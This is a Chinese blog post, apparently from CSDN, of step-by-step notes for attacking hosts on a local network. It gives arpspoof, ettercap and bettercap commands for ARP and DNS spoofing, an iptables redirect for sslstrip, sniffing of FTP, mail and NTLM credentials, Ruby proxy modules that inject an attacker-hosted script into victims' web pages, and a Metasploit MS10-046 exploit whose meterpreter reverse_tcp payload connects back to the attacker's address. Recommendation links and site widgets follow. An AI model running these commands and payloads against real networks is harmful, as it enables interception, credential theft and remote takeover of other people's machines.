内网劫持结合metasploit

最新推荐文章于 2022-10-01 22:07:28 发布
最新推荐文章于 2022-10-01 22:07:28 发布
阅读量934 收藏 1
点赞数
分类专栏: 安全技术 工具使用 文章标签: bettercap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37438418/article/details/79826506
版权
内网劫持命令:
bettercap -X -I eth0 -G 192.168.211.1 -T 192.168.211.137 --dns '/root/桌面/dns.conf'
ettercap -Tq -i eth0 -P dns_spoof -T 192.168.211.137
ipconfig/flushdns   清除缓存
echo 1 > /proc/sys/net/ipv4/ip_forward    启用内核包转发,修改/proc/sys/net/ipv4/ip_forward文件

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000   端口转发,10000为sslstrip的监听端口


Ettercap+arpspoof+sslstrip=Bettercap
arpspoof -i eth0 -t 192.168.211.137 192.168.211.1   shell1,ARP欺骗

sslstrip -l 10000   使用sslstrip监听10000端口

//sslstrip -a -k -f   开启sslstrip

ettercap -T -q -i eth0   嗅探得到登陆Gmail邮箱的用户名和密码
第一个//中加上目标主机,第二个//中加上网关路由ip

Bettercap
凭证嗅探器

内置的嗅探器目前能够分析打印如下网络内容:
1.被访问的URLs
2.被访问过的HTTPS主机
3.HTTP发布过的数据
4.HTTP Basic认证以及摘要认证
5.FTP凭证
6.IRC凭证
7.POP, IMAP以及SMTP凭证
8.NTLMv1/v2 ( HTTP, SMB, LDAP等) 凭证


bettercap arp spoofing功能以及它的多个主机发现代理能够将令人烦躁的步骤简化。你只需要启动工具,然后等待它完成工作。
sudo bettercap -X  嗅探器默认的模式,所有解析器启用: 


sudo bettercap -X -P "FTP,HTTPAUTH,MAIL,NTLMSS"   启用嗅探器,启用指定解析器


sudo bettercap -X -L    启用嗅探器+所有解析器,此外并解析本地通信


一个模块化的透明代理,可以从使用–proxy参数开始。除非你记录HTTP请求,在默认情况下他不会做任何事。当然你也可以指定一个–proxy-module参数,这样你就可以加载自己的模块,随意操作HTTP流量


sudo bettercap --proxy    默认端口(8080)启用代理,不带任何模块


sudo bettercap --proxy --proxy-port=8081    使用自定义端口启用代理


sudo bettercap --proxy --proxy-module=hack_title.rb     启用代理并加载hack_title.rb模块


sudo bettercap -S NONE --proxy   禁用spoofer并启用代理(独立代理模式)




class HackTitle < Proxy::Module
  def on_request( request, response )    # is it a html page?
    if response.content_type == 'text/html'
      Logger.info "Hacking http://#{request.host}#{request.url} title tag"
      # make sure to use sub! or gsub! to update the instance
      response.body.sub!( '<title>', '<title> !!! HACKED !!! ' )    end
  endend


bettercap内置一个HTTP服务器,允许你从自己的机器上定制内容,而不需要安装配置诸如Apache, nginx 或者lighttpd等软件。


你需要使用proxy module模块:


class InjectJS < Proxy::Module
  def on_request( request, response )    
  # is it a html page?
    if response.content_type == 'text/html'
      Logger.info "Injecting javascript file into http://#{request.host}#{request.url} page"
      # get the local interface address and HTTPD port
      localaddr = Context.get.iface[:ip_saddr]
      localport = Context.get.options[:httpd_port]      
      # inject the js
      response.body.sub!( '</title>', "</title><script src='http://#{localaddr}:#{localport}/file.js'
       type='text/javascript'></script>" )
          end
  end
end
接着使用它就能将JS文件注入到HTTP响应中,使用bettercap来管理这个文件




MS10_046
Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所指定的目标具有相同的效果。


Windows没有正确地处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。这些代码可能位于USB驱动、本地 或远程文件系统、光驱或其他位置,使用资源管理器查看了LNK文件所在位置就足以触发这个漏洞。默认下Windows启动了自动加载和自动播放功能,因此 在连接可移动设备(如USB闪存)后Windows会自动打开资源管理器。其他显示文件图标的应用也可用作这个漏洞的攻击载体。受影响的Windows系统如下:


受影响的Windows系统类型


Microsoft Windows XP SP3


Microsoft Windows XP SP2


Microsoft Windows Vista SP2


Microsoft Windows Vista SP1


Microsoft Windows Server 2008


Microsoft Windows Server 2008 SP2


Microsoft Windows Server 2008 R2


Microsoft Windows Server 2003 SP2


Microsoft Windows 7


sudo bettercap --httpd --http-path=/path/to/your/js/file/ --proxy --proxy-module=inject.rb


use exploit/windows/browser/ms10_046_shortcut_icon_dllloader 


set payload windows/meterpreter/reverse_tcp


set LHOST 192.168.211.179


set SRVHOST 192.168.211.179


exploit





























































































































































Wh0ale
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Set+Metasploit+Ettercap渗透欺骗拿Shell
suixinxxx的博客
11-09 826
社会工程学工具集Social-Engineer Toolkit 是一款有效帮助于社工工程学的工具,被收录到backtrack 工具无论在国内还是国外,不受渗透环境影响。 Metasploit 是一款框架式渗透工具,现在逐渐变成一个攻击开发平台。 Metasploit给渗透带来极大的方便。特别是后渗透,持续控制方面。 Ettercap被动式嗅探,内网安全检测软件。
内网会话劫持
weixin_30734435的博客
07-11 251
会话劫持 环境:一台kali虚拟机(攻击者,IP:192.168.41.140) 一台win7虚拟机(用户,IP:192.168.41.129) 网关IP:192.168.41.2 第一步 使用nmap扫描局域网内活动的主机,确定攻击目标,这里的192.168.41.129就是要进行劫持的目标。 第二步 使用arpspoof命令进行arp欺骗攻击。 先打开kali的转发功能,否则用户端不能正常上...
局域网dns欺骗攻击不能上网_局域网霸主之bettercap
weixin_34666478的博客
01-10 726
郑重声明:文中涉及的技术、思路和工具仅以安全为目的学习交流,让大家对网络安全有一个正确的认识,任何人不得将其用于违法犯罪用途,否则后果自行承担!!!过了这么久,我终于回来了,让大家久等了 这段时间更新慢是一方面是本人学生,上课时间紧,另一方面原因疫情影响电脑不在身边,借的电脑带不起来多台虚拟机,所以很多次写到一半,电脑卡主死机了,以至于这么久没更新,不过大...
使用Kali Linux Metasploit 对WEB应用进行攻击 以DVWA为例
xujing19920814的博客
10-01 2858
使用Kali Linux Metasploit 对WEB应用进行攻击 以DVWA为例
Metasploit(一) 利用 MS17-010 漏洞进行攻击
buffedon的博客
06-03 5668
借助 metasploit 利用 MS17-010 漏洞进行攻击Metasploit 简介 (简称:MSF)经常被利用的端口MS17-010利用流程1. 存活判断2. 端口扫描3. 服务识别4. 系统识别5. 漏洞利用后渗透阶段基础命令POST后渗透模块访问文件系统权限提升获取密码的方式run windows/gather/credentials/windows_autologinhashdump 模块mimikatz程序加载kiwi模块MSF中的 mimikatz 模块 Metasploit 简介 (简称
metasploit-framework-6.3.34.zip
最新发布
09-17
Metasploit Framework 6.3.34:渗透测试的利器》 Metasploit Framework,简称MSF,是一款开源的安全漏洞检测工具,主要用于安全研究人员进行渗透测试和漏洞验证。这个版本是6.3.34,代表着软件的最新迭代,通常会...
metasploitframework-latest.msi
09-17
metasploitframework-latest.msi
Metasploit教程
06-07
Metasploit教程Metasploit教程Metasploit教程Metasploit教程
metasploitframework框架
09-28
metasploit-framework-V6.1.8适用于Windows系统。 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击
网络攻击实验【部分】- 结果可能有区别:系统不同【可能对你有帮助】
小源同学的博客
11-14 3876
文章目录第一步Whois查询IP查询使用kali的host 和 dig 命令查询域名信息,使用dnsenum 和 dnsrecon 枚举域名hostdnsenum通过metaploit进行目录结构分析打开metaploit找到的渗透模块【了解】目录结构分析【dir_scanner为例】拓补结构用Nmap确定操作系统类型nmap扫描远程端口通过metasploit http_version 模块确定版本号搜索你要扫描的服务模块设置目标的IP,然后run一下用Goby 进行漏洞扫描下载Goby【免费】下载好后直
Kali渗透测试:使用Metasploit对Web应用的攻击
Liu_Bruce的博客
05-15 3527
Kali渗透测试:使用Metasploit对Web应用的攻击 Web应用程序的漏洞数量众多,这里我们以其中一个命令注入漏洞为例复现一下。这种漏洞源于Web应用程序没有对用户输入的内容进行准确的验证,从而导致操作系统执行了攻击者输入的命令。下面是一段运行在Metasploitable2靶机上的PHP脚本,它来自于DVWA,代码如下: <html> <body> <form name="ping" action="#" method="post"> &
metasploit的客户端WEB攻击
天元喜羊羊的博客
05-28 3184
环境:BT5R3,XP SP3,IE6 操作如下: root@bt:/pentest/exploits/set# ./set ..######..########.######## .##....##.##..........##... .##.......##........
配置metasploit进行远程攻击的基本步骤和利用metasploit进行基本扫描
D-R0s1的博客
01-26 2279
metasploit的介绍         当完成前期的情报侦察工作以后,通过隐蔽的探测扫描识别到了系统的脆弱点,作为渗透测试人员要进一步的利用漏洞突破目标,获取利益和成就感。         Metasploit框架主要用于攻击工具的开发,漏洞工具的利用和攻击过程的辅助支撑,这个框架最大的优点在于它以研究的理念进行攻击工具的开发。因此,它非常容易开发和使用自己的metasploit模块,攻...
Metasploit内网渗透大杀器
Grey的博客
03-30 3201
一、基础用法1.数据库连接#1 首先启动postgresql数据库:/etc/init.d/postgresql start;或者 service postgresql start;#2 初始化MSF数据库(关键步骤!):msfdb init;#3 运行msfconsole:msfconsole;#4 在msf中查看数据库连接状态:db_status。如果不想每次开机都这样,还可以配置随系统启动u...
Kali渗透-DNS域名劫持与钓鱼
道阻且长,行则将至。
03-02 9439
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 本文目的 演示如何借助 Kali Linux 系统内置的一款基于ARP地址欺骗的网络嗅探工具Ettercap,对局域网内的 Win7 主机进行 DNS 域名劫持,从而使得受害主机访问新浪官网(或其他任意网站)的域名时跳转到 Kali 攻击机指定的恶意网页,实现网络钓鱼攻击。 环境说明 主机 IP地址 Kali Linux...
后渗透阶段之基于MSF的内网主机探测(存活、端口、服务)
谢公子的博客
06-17 9586
目录 主机存活探测 端口扫描 服务探测 当我们通过代理可以进入某内网,需要对内网主机的服务进行探测。我们就可以使用MSF里面的内网主机探测模块了。 在这之前,先修改 /etc/proxychains.conf ,加入我们的代理。 然后 proxychains msfconsole启动MSF,这样,我们的MSF就可以探测内网主机了。 或者是在MSF里面添加0.0.0.0/...
tunna类似redush的工具
cnbird's blog
09-30 1947
http://www.secforce.com/media/tools/tunna_v0.1.zip
基于hunt1.5的TCP会话劫持
weixin_44080187的博客
11-15 663
基于hunt的TCP会话劫持 TCP会话劫持攻击,是劫持通信双方已建立的TCP会话连接,假冒其中一方身 份与另一方进行进一步通信。攻击者通过ARP欺骗、ICMP路由重定向攻击等 方法实现中间人攻击,嗅探到客户端和telnet服务器之间的通信内容。通常一些网 络服务会建立在TCP会话之后进行应用层的身份认证,客户端在通过身份认证之 后,就可以通过TCP会话连接对服务器 索取资源。且期间不用再次进行身份认 证。而TCP会话劫持攻击者提供了一种绕过应用层身份认证的技术途径。 会话被攻击劫持之后,客户端仍
第一百零九课:依托 metasploit 尽可能多的发现目标内网下的各类高价值存活主机1
08-03
因此,在本课中,我们将介绍如何依托强大的渗透测试工具 metasploit 来尽可能多地发现目标内网下的各类高价值存活主机。 首先,metasploit 是一款功能强大的渗透测试工具,具有丰富的漏洞利用模块和自动化的渗透...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值